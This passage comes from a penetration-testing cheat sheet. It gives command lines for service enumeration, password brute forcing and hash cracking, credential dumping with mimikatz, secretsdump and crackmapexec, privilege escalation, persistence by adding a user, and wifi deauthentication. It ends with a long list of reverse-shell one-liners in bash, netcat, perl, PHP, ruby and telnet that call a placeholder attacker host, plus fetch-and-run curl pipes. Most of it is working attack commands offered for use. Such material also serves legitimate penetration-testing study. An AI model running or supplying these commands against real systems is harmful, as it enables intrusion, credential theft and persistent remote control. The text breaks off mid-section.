smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse $IP 623 | ``` 624 | 625 | smb4k on Kali, useful Linux GUI for browsing SMB shares 626 | 627 | ```bash 628 | apt-get install smb4k -y 629 | ``` 630 | 631 | - on Windows: 632 | - Download All Files From A Directory Recursively 633 | 634 | ```bash 635 | smbclient '\\server\share' -N -c 'prompt OFF;recurse ON;cd 'path\to\directory\';lcd '~/path/to/download/to/';mget *' 636 | ``` 637 | 638 | ```bash 639 | net use \\TARGET\IPC$ "" /u:"" #Manual Null session testing 640 | ``` 641 | 642 | ## **SNMP Enumeration (161):** 643 | 644 | - Fix SNMP output values so they are human readable: 645 | 646 | ```bash 647 | apt-get install snmp-mibs-downloader download-mibs 648 | echo "" > /etc/snmp/snmp.conf 649 | ``` 650 | 651 | ```bash 652 | snmpwalk -c public -v1 192.168.1.X 1| 653 | grep hrSWRunName|cut -d* * -f 654 | ``` 655 | 656 | ```bash 657 | snmpcheck -t 192.168.1.X -c public 658 | ``` 659 | 660 | ```bash 661 | onesixtyone -c names -i hosts 662 | ``` 663 | 664 | ```bash 665 | nmap -sT -p 161 192.168.X.X -oG snmp_results.txt 666 | nmap -n -vv -sV -sU -Pn -p 161,162 –script=snmp-processes,snmp-netstat IP 667 | ``` 668 | 669 | ```bash 670 | snmpenum -t 192.168.1.X 671 | ``` 672 | 673 | ```bash 674 | onesixtyone -c names -i hosts 675 | ``` 676 | 677 | ```bash 678 | #metasploit 679 | auxiliary/scanner/snmp/snmp_enum 680 | auxiliary/scanner/snmp/snmp_enum_hp_laserjet 681 | auxiliary/scanner/snmp/snmp_enumshares 682 | auxiliary/scanner/snmp/snmp_enumusers 683 | auxiliary/scanner/snmp/snmp_login 684 | ``` 685 | 686 | ## **Oracle (1521):** 687 | 688 | ```bash 689 | tnscmd10g version -h INSERTIPADDRESS 690 | ``` 691 | 692 | ```bash 693 | tnscmd10g status -h INSERTIPADDRESS 694 | ``` 695 | 696 | ## LDAP (389) 697 | 698 | [JXplorer - an open source LDAP browser](http://jxplorer.org/) 699 | 700 | ## MSSQL (1433) 701 | 702 | ```bash 703 | nmap -n -v -sV -Pn -p 1433 –script ms-sql-brute –script-args userdb=users.txt,passdb=passwords.txt IP 704 | nmap -n -v -sV -Pn -p 1433 –script ms-sql-info,ms-sql-ntlm-info,ms-sql-empty-password IP 705 | ``` 706 | 707 | [Hunting for MSSQL | Offensive Security](https://www.offensive-security.com/metasploit-unleashed/hunting-mssql/) 708 | 709 | ## **Mysql Enumeration (3306):** 710 | 711 | ```bash 712 | nmap -sV -Pn -vv 10.0.0.1 -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 713 | 714 | mysql –h IP -u root -p 715 | show databases; 716 | show tables; 717 | use tablename; 718 | describe table; 719 | select table1, table2 from tablename; 720 | ``` 721 | 722 | ## Active Directory 723 | 724 | ```bash 725 | # current domain info 726 | [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain() 727 | 728 | # domain trusts 729 | ([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships() 730 | 731 | # current forest info 732 | [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest() 733 | 734 | # get forest trust relationships 735 | ([System.DirectoryServices.ActiveDirectory.Forest]::GetForest((New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', 'forest-of-interest.local')))).GetAllTrustRelationships() 736 | 737 | # get DCs of a domain 738 | nltest /dclist:offense.local 739 | net group "domain controllers" /domain 740 | 741 | # get DC for currently authenticated session 742 | nltest /dsgetdc:offense.local 743 | 744 | # get domain trusts from cmd shell 745 | nltest /domain_trusts 746 | 747 | # get user info 748 | nltest /user:"spotless" 749 | 750 | # get DC for currently authenticated session 751 | set l 752 | 753 | # get domain name and DC the user authenticated to 754 | klist 755 | 756 | # get all logon sessions. Includes NTLM authenticated sessions 757 | klist sessions 758 | 759 | # kerberos tickets for the session 760 | klist 761 | 762 | # cached krbtgt 763 | klist tgt 764 | 765 | # whoami on older Windows systems 766 | set u 767 | 768 | # find DFS shares with ADModule 769 | Get-ADObject -filter * -SearchBase "CN=Dfs-Configuration,CN=System,DC=offense,DC=local" | select name 770 | 771 | # find DFS shares with ADSI 772 | $s=[adsisearcher]'(name=*)'; $s.SearchRoot = [adsi]"LDAP://CN=Dfs-Configuration,CN=System,DC=offense,DC=local"; $s.FindAll() | % {$_.properties.name} 773 | 774 | # check if spooler service is running on a host 775 | powershell ls "\\dc01\pipe\spoolss" 776 | ``` 777 | 778 | ## MSSQL 779 | 780 | Try using "Browse for More" via MS SQL Server Management Studio 781 | 782 | Enumeration / Discovery: 783 | 784 | Nmap: 785 | 786 | ```bash 787 | nmap -sU --script=ms-sql-info 192.168.1.108 192.168.1.156 788 | ``` 789 | 790 | Metasploit: 791 | 792 | ```bash 793 | msf > use auxiliary/scanner/mssql/mssql_ping 794 | ``` 795 | 796 | ### Bruteforce MSSQL Login 797 | 798 | ```bash 799 | msf > use auxiliary/admin/mssql/mssql_enum 800 | ``` 801 | 802 | ### Metasploit MSSQL Shell 803 | 804 | ```bash 805 | msf > use exploit/windows/mssql/mssql_payload 806 | msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp 807 | ``` 808 | 809 | # Gaining Access 810 | 811 | - hydra: bruteforce tool 812 | 813 | ```bash 814 | hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://10.0.0.101 -t 4 -v -f 815 | #-l is the user we want to attack, -P password file list, -t threads, -v verbose 816 | #it's better to intercept the login page with burp, check to see the correct username&password syntax and copy the exact failed message 817 | -#f exit when a login/pass pair is found 818 | hydra -l hasamba -P ~/Desktop/test_passwords.txt 10.0.0.210 -s 8085 http-post-form "/login/:username=^USER^&password=^PASS^:F=Authentication failed" -VVV -t 6 - 819 | hydra OPT #will show us optional moduls for http and such 820 | hydra -U MODULE_NAME #will show module examples 821 | 822 | hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 192.168.X.XXX ftp -V #Hydra FTP brute force 823 | hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 192.168.X.XXX pop3 -V #Hydra POP3 brute force 824 | hydra -P /usr/share/wordlistsnmap.lst 192.168.X.XXX smtp -V #Hydra SMTP brute force 825 | 826 | hydra -l username -P password-list http-post-form ":POST_REQUEST_FOR_LOGIN:FAILED_RESPONSE_IDENTIFIER" 827 | ``` 828 | 829 | - metasploit - can also bruteforce 830 | 831 | ```bash 832 | use auxialary/scanner/ssh/ssh_login 833 | options 834 | set username root 835 | set pass_file /usr/share... 836 | set rhosts 837 | set threads 10 838 | set verbose true 839 | run 840 | ``` 841 | 842 | - unshadow (kali) - combine both files and will insert the hashed passwords to the passwd file, so we can use this file with hashcat to maybe decrypt the password. 843 | 844 | ```bash 845 | unshadow PASSSWD_FILE SHADOW_FILE 846 | ``` 847 | 848 | - [hashcat](https://www.notion.so/Hashcat-b885f8ac8c0f450986d62c0d29f44cb9) - crack passwords hashes ([Cheat Sheet](https://s3.us-west-2.amazonaws.com/secure.notion-static.com/a44ab748-a9a9-437e-a4a1-2fa1cc6c03a8/HashcatCheatSheet.v2018.1b.pdf?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAT73L2G45O3KS52Y5%2F20201122%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20201122T190235Z&X-Amz-Expires=86400&X-Amz-Signature=03753b73d70b97901e6a764011ae5ffdbffc2d9dcbd00673f79b64097b1299d9&X-Amz-SignedHeaders=host&response-content-disposition=filename%20%3D%22HashcatCheatSheet.v2018.1b.pdf%22)) 849 | 850 | ```bash 851 | hashcat -m "OSCODE" unshadow.txt passwordFile.txt 852 | #from here: https://github.com/frizb/Hashcat-Cheatsheet 853 | hashcat --force -m300 --status -w3 -o found.txt --remove --potfile-disable -r rules\OneRuleToRuleThemAll.rule hash.txt rockyou.txt 854 | ``` 855 | 856 | - hash-identifier 857 | 858 | ```bash 859 | hash-identifier [hash] 860 | ``` 861 | 862 | - [name-that-hash](https://github.com/HashPals/Name-That-Hash) - better hash analyzer 863 | 864 | ```jsx 865 | 866 | ``` 867 | 868 | - cewl - create wordlist from a website 869 | 870 | ```bash 871 | cewl -v --with-numbers -e --email_file cewl_email.wordlist -w cewl.wordlist http://sneakycorp.htbme 872 | 873 | #my favorite rule to add: 874 | john --wordlist=wordlist.txt --rules=jumbo --stdout > wordlist-modified.txt 875 | 876 | hashcat --force cewl.wordlist -r /usr/share/hashcat/rules/best64.rule --stdout > hashcat_words 877 | 878 | https://github.com/praetorian-inc/Hob0Rules 879 | ###hob064 This ruleset contains 64 of the most frequent password patterns 880 | hashcat -a 0 -m 1000 wordlists/rockyou.txt -r hob064.rule -o cracked.txt 881 | 882 | ###d3adhob0 This ruleset is much more extensive and utilizes many common password structure ideas 883 | hashcat -a 0 -m 1000 wordlists/english.txt -r d3adhob0.rule -o cracked.txt 884 | 885 | #adding John rules 886 | john --wordlist=wordlist.txt --rules --stdout > wordlist-modified.txt 887 | john --wordlist=wordlist.txt --rules=best64 --stdout > wordlist-modified.txt 888 | ``` 889 | 890 | - john the ripper - password cracker ([cheat sheet](https://drive.google.com/viewerng/viewer?url=https://countuponsecurity.files.wordpress.com/2016/09/jtr-cheat-sheet.pdf)) ([Jumbo community version](https://github.com/openwall/john)) 891 | 892 | ```bash 893 | john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt 894 | #after john finished, ask him to show 895 | john hashes.txt --show 896 | 897 | john 127.0.0.1.pwdump --wordlist=dictionary.txt --rules=Jumbo #with jumbo rules from https://github.com/openwall/john 898 | ``` 899 | 900 | [CyberChef](https://gchq.github.io/CyberChef/) 901 | 902 | [CrackStation - Online Password Hash Cracking - MD5, SHA1, Linux, Rainbow Tables, etc.](https://crackstation.net/) 903 | 904 | [Hash Analyzer](https://www.tunnelsup.com/hash-analyzer/) 905 | 906 | [Cipher Identifier (online tool) | Boxentriq](https://www.boxentriq.com/code-breaking/cipher-identifier) 907 | 908 | - msfvenom(kali) - tool to create malware 909 | 910 | ```bash 911 | msfvenom -p windows/meterpreter/reverse_tcp LHOSTS=10.10.10.14 LPORT=4444 -f aspx > ex.aspx 912 | 913 | msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war 914 | ``` 915 | 916 | - [responder (imapcket)](https://www.notion.so/responder-imapcket-b7bdbbb91ce74e98834dd88ec1715528) - MITM - listening in the background and wait for a failed dns request 917 | 918 | ```bash 919 | responder -I eth0 -rdwv #Run Responder.py for the length of the engagement while you're working on other attack vectors. 920 | ``` 921 | 922 | # Post Exploitation 923 | 924 | ## Useful commands running locally on the Linux system To quickly analyze the system and possibly help to escalate privileges 925 | 926 | - whoami - shows the user we logged in with 927 | - history - show last history, it usually can show any password or personal stuff the user execute 928 | - sudo -l - show what programs we can run without sudo, check all process against [GTFOBins](https://gtfobins.github.io/) 929 | - if we get `(ALL, !root) /bin/bash`, we can exploit with [this](https://www.exploit-db.com/exploits/47502) 930 | - uname -a - will show us the linux version so we can search for a script that will escalate privileges 931 | - export - check system variables 932 | - processes 933 | 934 | ```bash 935 | ps -ef 936 | ps auxf 937 | ps auxfww 938 | ``` 939 | 940 | - find in files 941 | 942 | ```bash 943 | find . -name "*.java" -type f -exec fgrep -iHn "textToFind" {} \; 944 | find . -regex ".*\.\(c\|java\)" -type f -exec fgrep -iHn "textToFind" {} \; 945 | find / -maxdepth 4 -name *.conf -type f -exec grep -Hn "textToFind" {} \; 2>/dev/null 946 | # SUID files owned by root 947 | find / -uid 0 -perm -4000 -type f 2>/dev/null 948 | # SUID files owned by root and world readable 949 | find / -uid 0 -perm -u=s,o=r -type f -exec ls -la {} \; 2> /dev/null 950 | # SUID files 951 | find / -perm -4000 -type f 2>/dev/null 952 | # world writable directories 953 | find / -perm -2 -type d 2>/dev/null 954 | 955 | #find passwords in files and ignore errors and filter out the proc and other folders 956 | find . ! -path "*/proc/*" -type f -name "*" -exec fgrep -iHn password {} \; 957 | find . -type f \( -iname \*.conf -o -iname \*.cfg -o -iname \*.xml -o -iname \*.ini -o -iname \*.json -o -iname \*.sh -o -iname \*.pl -o -iname \*.py \) -exec fgrep -iHn password {} \; 2> /dev/null 958 | 959 | # find using several patterns read from file (patterns are delimited by new line) 960 | find . -type f -exec grep -iHFf patterns.txt {} \; 961 | 962 | # find password keyword in small files 963 | find . -type f -size -512k -exec fgrep -iHn password {} \; 964 | 965 | # reverse java jar files and find passwords there 966 | find . -name "*.jar" -type f -exec ~/jd-cli/jd-cli -oc -l -n -st {} \; | egrep -i -e "Location:" -e "password" | uniq 967 | ``` 968 | 969 | ```bash 970 | # check open ports and services listening 971 | netstat -anp 972 | 973 | # check defined hosts 974 | cat /etc/hosts 975 | 976 | # check local IP addresses and interfaces 977 | ifconfig -a 978 | 979 | # check route 980 | route -v 981 | 982 | # check filesystem 983 | df 984 | 985 | # check sudo privileges 986 | sudo -l 987 | 988 | # check crontab 989 | crontab -l 990 | 991 | # check inittab 992 | cat /etc/inittab 993 | 994 | # try to sniff traffic 995 | tcpdump 996 | tcpdump -s0 not port 22 -w trace.pcap 997 | 998 | # check known hosts 999 | cat ~/.ssh/known_hosts 1000 | 1001 | # try access mails 1002 | head /var/mail/root 1003 | 1004 | # list groups, users 1005 | cat /etc/group 1006 | cat /etc/passwd 1007 | # with root privileges 1008 | cat /etc/shadow 1009 | 1010 | # check shared memory 1011 | ipcs -mp 1012 | 1013 | # logout 1014 | logout 1015 | 1016 | # close script session 1017 | Ctrl + D 1018 | ``` 1019 | 1020 | ## Scripts 1021 | 1022 | - [pwncat](https://github.com/calebstewart/pwncat) - pwncat is a post-exploitation platform for Linux targets 1023 | 1024 | ```bash 1025 | cd ~/tools 1026 | source pwncat-env/bin/activate 1027 | 1028 | # Connect to a bind sheql 1029 | pwncat connect://10.10.10.10:4444 1030 | pwncat 10.10.10.10:4444 1031 | pwncat 10.10.10.10 4444 1032 | # Listen for reverse shell 1033 | pwncat bind://0.0.0.0:4444 1034 | pwncat 0.0.0.0:4444 1035 | pwncat :4444 1036 | pwncat -lp 4444 1037 | # Connect via ssh 1038 | pwncat ssh://user:password@10.10.10.10 1039 | pwncat user@10.10.10.10 1040 | pwncat user:password@10.10.10.10 1041 | pwncat -i id_rsa user@10.10.10.10 1042 | # SSH w/ non-standard port 1043 | pwncat -p 2222 user@10.10.10.10 1044 | pwncat user@10.10.10.10:2222 1045 | # Reconnect utilizing installed persistence 1046 | # If reconnection failes and no protocol is specified, 1047 | # SSH is used as a fallback. 1048 | pwncat reconnect://user@10.10.10.10 1049 | pwncat reconnect://user@c228fc49e515628a0c13bdc4759a12bf 1050 | pwncat user@10.10.10.10 1051 | pwncat c228fc49e515628a0c13bdc4759a12bf 1052 | pwncat 10.10.10.10 1053 | 1054 | ^D 1055 | run enumerate.gather 1056 | 1057 | run escalate.auto exec 1058 | 1059 | ---OLD--- 1060 | 1061 | upload/download --help 1062 | 1063 | persist --help 1064 | persist --install 1065 | perist --status 1066 | persist --clean 1067 | 1068 | tamper --help 1069 | 1070 | busybox --install 1071 | 1072 | enum --help 1073 | enum --show --type sudo 1074 | enum --report enumaration.md 1075 | 1076 | privsec --help 1077 | privsec -l 1078 | privsec --escalate 1079 | privsec -e -u sysadmin 1080 | ``` 1081 | 1082 | - [sherlock](https://github.com/rasta-mouse/Sherlock) - PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities. 1083 | - [windows exploit suggester](https://github.com/AonCyberLabs/Windows-Exploit-Suggester) - This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins. 1084 | - metasploit migrate process and search suggester 1085 | 1086 | ```bash 1087 | ps 1088 | migrate 1788 1089 | search suggester 1090 | ``` 1091 | 1092 | - [psexec](Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/psexec%20d818d32588314cb68f8ca3db57a6e1ef.md), wmiexec.py or [smbexec.py](http://smbexec.py) - privilege escalation for windows 1093 | - [powershellempire](https://github.com/PowerShellEmpire/PowerTools) - windows privilege escalation 1094 | 1095 | ```bash 1096 | powershell -ep (ExecutionPolicy) bypass 1097 | . .\PowerView.ps1 1098 | Get-NetDomain 1099 | Get-NetDomainController 1100 | Get-DomainPolicy 1101 | (Get-DomainPolicy)."system access" 1102 | Get-NetUser 1103 | Get-NetUser | select cn /samaccountname/description 1104 | Get-UserProperty -Properties pwdlastset/logoncount/badpwdcount 1105 | Get-NetComputer -FullData(extra data) | select(like grep) OperatingSystem 1106 | Get-NetGroupMember -GroupName "Domain Admins" 1107 | Invoke-ShareFinder 1108 | Get-NetGPO | select displayname, whenchanged 1109 | 1110 | ``` 1111 | 1112 | - [bloodhound](https://github.com/BloodHoundAD/BloodHound) - easily identify highly complex attack paths 1113 | - crackmapexec - can take passwords or hashes that we found and check them against all computers on a network 1114 | 1115 | ```powershell 1116 | crackmapexec 192.168.57.0/24 -u fcastle -d MARVEL.local -p Password1 1117 | #Spray the network with local login credentials then dump SAM contents 1118 | crackmapexec smb 10.0.0.1/24 -u administrator -p 'password' --local-auth --sam 1119 | #Pass the hash network-wide, local login, dump LSA contents 1120 | crackmapexec smb 10.0.0.1/24 -u administrator -H --local-auth --lsa 1121 | 1122 | ``` 1123 | 1124 | - [secretsdump.py](http://secretsdump.py) (impacket) - dumps hashes for known user/password 1125 | 1126 | ```powershell 1127 | secretsdump.py marvel/fcastle:Pssword1@192.168.4.4 1128 | ``` 1129 | 1130 | - [incognito (meterpeter)](https://www.notion.so/incognito-meterpeter-881379ef297d4b3f8b50745428e1e8ed) - can impersonate a user 1131 | - [GetUserSPNs.py](http://getuserspns.py) (impacket) 1132 | 1133 | ```bash 1134 | GetUserSpns.py marvel.local/fcastle:Password1 -dc-ip 192.168.57.140 -request 1135 | ``` 1136 | 1137 | - [mimikatz](https://github.com/gentilkiwi/mimikatz) - can extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets 1138 | 1139 | ```bash 1140 | mimikatz 1141 | privilege::debug` (allow us to bypass several protections) 1142 | sekurlsa::logonpasswords` show us all users login from reboot, we can pass the hash or crack them, we can search for `wdigest` until windows8 including windows7 the passoword stored in plain text, from windows8 microsoft turned it off, we can turn it on from mimikatz and wait for a user to login 1143 | lsadump::sam` dumps the SAM 1144 | lsadump::lsa /patch` dumps Local Security Authority 1145 | lsadump::lsa /inject /name:krbtgt` 1146 | kerberos::golden /User:Administrator(doesnt matter, can be fake) /domain:marvel.local /sid:SID /krbtgt:NTLM /id:500(your RID) /ptt(pass the ticket to our next session)` 1147 | misc::command` (gives us command prompt with full privilege) 1148 | ``` 1149 | 1150 | # Privilige Escalation ([alot of resources](https://github.com/coreb1t/awesome-pentest-cheat-sheets#privilege-escalation)) 1151 | 1152 | [Linux privilege escalation](https://jok3rsecurity.wordpress.com/linux-privilege-escalation/) 1153 | 1154 | [Linux Privilege Escalation CheatSheet for OSCP - ByteFellow](https://www.bytefellow.com/linux-privilege-escalation-cheatsheet-for-oscp/) 1155 | 1156 | [windows privilege escalation](https://jok3rsecurity.wordpress.com/windows-privilege-escalation/) 1157 | 1158 | [Windows Privilege Escalation Cheatsheet for OSCP - ByteFellow](https://www.bytefellow.com/windows-privilege-escalation-cheatsheet-for-oscp/) 1159 | 1160 | [C0nd4/OSCP-Priv-Esc](https://github.com/C0nd4/OSCP-Priv-Esc) 1161 | 1162 | ## **Linux:** 1163 | 1164 | Find Binaries that will execute as the owner 1165 | 1166 | ```bash 1167 | find / -perm -u=s -type f 2>/dev/null 1168 | ``` 1169 | 1170 | Find binaries that will execute as the group 1171 | 1172 | ```bash 1173 | find / -perm -g=s -type f 2>/dev/null 1174 | ``` 1175 | 1176 | Find sticky-bit binaries 1177 | 1178 | ```bash 1179 | find / -perm -1000 -type d 2>/dev/null 1180 | ``` 1181 | 1182 | If Python is executable as root 1183 | 1184 | ```bash 1185 | python2.7 -c "import pty;pty.spawn('/bin/sh');" 1186 | ``` 1187 | 1188 | - [LinPeas](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS) - Linux Privilege Escalation Awesome Script 1189 | 1190 | ```bash 1191 | #From github 1192 | curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh 1193 | 1194 | #Local network 1195 | sudo python -m SimpleHTTPServer 80 1196 | curl 10.10.10.10/linpeas.sh | sh 1197 | 1198 | #Without curl 1199 | sudo nc -q 5 -lvnp 80 < linpeas.sh 1200 | cat < /dev/tcp/10.10.10.10/80 | sh 1201 | 1202 | #Output to file 1203 | linpeas -a > /dev/shm/linpeas.txt 1204 | less -r /dev/shm/linpeas.txt #Read with colors 1205 | ``` 1206 | 1207 | - [LinEnum](https://github.com/rebootuser/LinEnum) 1208 | 1209 | ```bash 1210 | ./LinEnum.sh -s -k keyword -r report -e /tmp/ -t 1211 | #-k Enter keyword 1212 | #-e Enter export location 1213 | #-t Include thorough (lengthy) tests 1214 | #-s Supply current user password to check sudo perms (INSECURE) 1215 | #-r Enter report name 1216 | #-h Displays this help text 1217 | ``` 1218 | 1219 | [https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) 1220 | 1221 | [https://github.com/pentestmonkey/unix-privesc-check](https://github.com/pentestmonkey/unix-privesc-check) 1222 | 1223 | ## **Windows:** 1224 | 1225 | ```powershell 1226 | #after getting a low privilege shell 1227 | systeminfo 1228 | #copy the result to systeminfo.txt 1229 | python2 ~/tools/Windows-Exploit-Suggester/windows-exploit-suggester.py --update 1230 | python2 ~/tools/Windows-Exploit-Suggester/windows-exploit-suggester.py --systeminfo systeminfo.txt --database [DB].xls 1231 | ``` 1232 | 1233 | [https://github.com/pentestmonkey/windows-prive](https://github.com/pentestmonkey/windows-privesc-check) 1234 | 1235 | [sc-check](https://github.com/pentestmonkey/windows-privesc-check) 1236 | 1237 | [http://www.fuzzysecurity.com/tutorials/16.html](http://www.fuzzysecurity.com/tutorials/16.html) 1238 | 1239 | [https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/](https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/) 1240 | 1241 | # Maintain Access 1242 | 1243 | - metasploit 1244 | 1245 | ```bash 1246 | persistence -h 1247 | OR 1248 | exploit/windows/local/persistence 1249 | OR 1250 | net user hacker password123 /add 1251 | ``` 1252 | 1253 | # Wireless Penetration 1254 | 1255 | - airmon-ng, airodump-ng, aircrack-ng - crack wifi networks 1256 | 1257 | ```bash 1258 | iwconfig #show wireless cards, check after connecting the wireless card to the vm machine in options 1259 | airmon-ng check kill #will kill process that intruppt 1260 | airmon-ng start wlan0 #starts monitor mode on the card 1261 | iwconfig #will assure that we are in monitor mode 1262 | airodump-ng wlan0mon #check for avaliable networks, PWR show the closer network, the smallest number is the closest 1263 | airodump-ng -c 6 --bssid MAC -w capture wlan0mon #will capture data from the specific MAC address of the network we want, 6 is the channel number of the network 1264 | 1265 | #we are waiting to capture the handshake, it will written in the header 1266 | #we can make it faster by DEAUTH which means kicking a connected user and while he re-auth we will capture the handshake 1267 | #in a new terminal: 1268 | aireplay-ng -0 1 -a MAC_OF_THE_NETWORK -c MAC_OF_THE_STATION_CONNECTED wlan0mon 1269 | ls capture* 1270 | aircrack-ng -w wordlist.txt -b MAC_OF_THE_NETWORK CAPTUREFILE #could be done also with hashcat 1271 | #phone numbers are very common as a password 1272 | 1273 | ``` 1274 | 1275 | # **Shells & Reverse Shells** 1276 | 1277 | ## **SUID C Shells** 1278 | 1279 | - bin/bash: 1280 | 1281 | ``` 1282 | int main(void){ 1283 | 1284 | setresuid(0, 0, 0); 1285 | 1286 | system("/bin/bash"); 1287 | 1288 | } 1289 | ``` 1290 | 1291 | - bin/sh: 1292 | 1293 | ``` 1294 | int main(void){ 1295 | 1296 | setresuid(0, 0, 0); 1297 | 1298 | system("/bin/sh"); 1299 | 1300 | } 1301 | ``` 1302 | 1303 | ### **TTY Shell:** 1304 | 1305 | ```bash 1306 | python -c 'import pty;pty.spawn("/bin/bash")' #Python TTY Shell Trick 1307 | ``` 1308 | 1309 | ```bash 1310 | echo os.system('/bin/bash') 1311 | ``` 1312 | 1313 | ```bash 1314 | /bin/sh –i #Spawn Interactive sh shell 1315 | ``` 1316 | 1317 | ```bash 1318 | execute('/bin/sh') 1319 | ``` 1320 | 1321 | - LUA 1322 | 1323 | ```bash 1324 | !sh 1325 | ``` 1326 | 1327 | - Privilege Escalation via nmap 1328 | 1329 | ```bash 1330 | :!bash 1331 | ``` 1332 | 1333 | - Privilege escalation via vi 1334 | 1335 | ### Fully Interactive TTY 1336 | 1337 | ``` 1338 | In reverse shell 1339 | python -c 'import pty; pty.spawn("/bin/bash")' 1340 | Ctrl-Z 1341 | In Attacker console 1342 | stty -a 1343 | stty raw -echo 1344 | fg 1345 | In reverse shell 1346 | reset 1347 | export SHELL=bash 1348 | export TERM=xterm-256color 1349 | stty rows columns 1350 | ``` 1351 | 1352 | ### **Spawn Ruby Shell** 1353 | 1354 | ```bash 1355 | exec "/bin/sh" 1356 | ``` 1357 | 1358 | ```bash 1359 | ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 1360 | ``` 1361 | 1362 | ### **Netcat** 1363 | 1364 | ```bash 1365 | nc -e /bin/sh ATTACKING-IP 80 1366 | ``` 1367 | 1368 | ```bash 1369 | /bin/sh | nc ATTACKING-IP 80 1370 | ``` 1371 | 1372 | ```bash 1373 | rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p 1374 | ``` 1375 | 1376 | ### **Telnet Reverse Shell** 1377 | 1378 | ```bash 1379 | rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p 1380 | ``` 1381 | 1382 | ```bash 1383 | telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443 1384 | ``` 1385 | 1386 | ### **PHP** 1387 | 1388 | ```bash 1389 | php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");' 1390 | ``` 1391 | 1392 | - (Assumes TCP uses file descriptor 3. If it doesn’t work, try 4,5, or 6) 1393 | 1394 | ### **Bash** 1395 | 1396 | ```bash 1397 | exec /bin/bash 0&0 2>&0 1398 | ``` 1399 | 1400 | ```bash 1401 | 0<&196;exec 196<>/dev/tcp/ATTACKING-IP/80; sh <&196 >&196 2>&196 1402 | ``` 1403 | 1404 | ```bash 1405 | exec 5<>/dev/tcp/ATTACKING-IP/80 cat <&5 | while read line; do $line 2>&5 >&5; done 1406 | ``` 1407 | 1408 | ```bash 1409 | # or: while read line 0<&5; do $line 2>&5 >&5; done 1410 | ``` 1411 | 1412 | ```bash 1413 | bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1 1414 | ``` 1415 | 1416 | ### **Perl** 1417 | 1418 | ```bash 1419 | exec "/bin/sh"; 1420 | ``` 1421 | 1422 | ```bash 1423 | perl —e 'exec "/bin/sh";' 1424 | ``` 1425 | 1426 | ```bash 1427 | perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' 1428 | ``` 1429 | 1430 | ```bash 1431 | perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' 1432 | ``` 1433 | 1434 | - Windows 1435 | 1436 | ```bash 1437 | perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' 1438 | ``` 1439 | 1440 | - 1441 | 1442 | # Meterpreter (Metasploit) ([cheet sheet](https://www.tunnelsup.com/metasploit-cheat-sheet/)) 1443 | 1444 | ### **Windows reverse meterpreter payload** 1445 | 1446 | ```bash 1447 | set payload windows/meterpreter/reverse_tcp 1448 | ``` 1449 | 1450 | - Windows reverse tcp payload 1451 | 1452 | ### **Windows VNC Meterpreter payload** 1453 | 1454 | ```bash 1455 | set payload windows/vncinject/reverse_tcpf 1456 | ``` 1457 | 1458 | - Meterpreter Windows VNC Payload 1459 | 1460 | ```bash 1461 | set ViewOnly false 1462 | ``` 1463 | 1464 | ### **Linux Reverse Meterpreter payload** 1465 | 1466 | ```bash 1467 | set payload linux/meterpreter/reverse_tcp 1468 | ``` 1469 | 1470 | - Meterpreter Linux Reverse Payload 1471 | 1472 | ### **Meterpreter Cheat Sheet** 1473 | 1474 | ```bash 1475 | upload file c:\\windows 1476 | ``` 1477 | 1478 | - Meterpreter 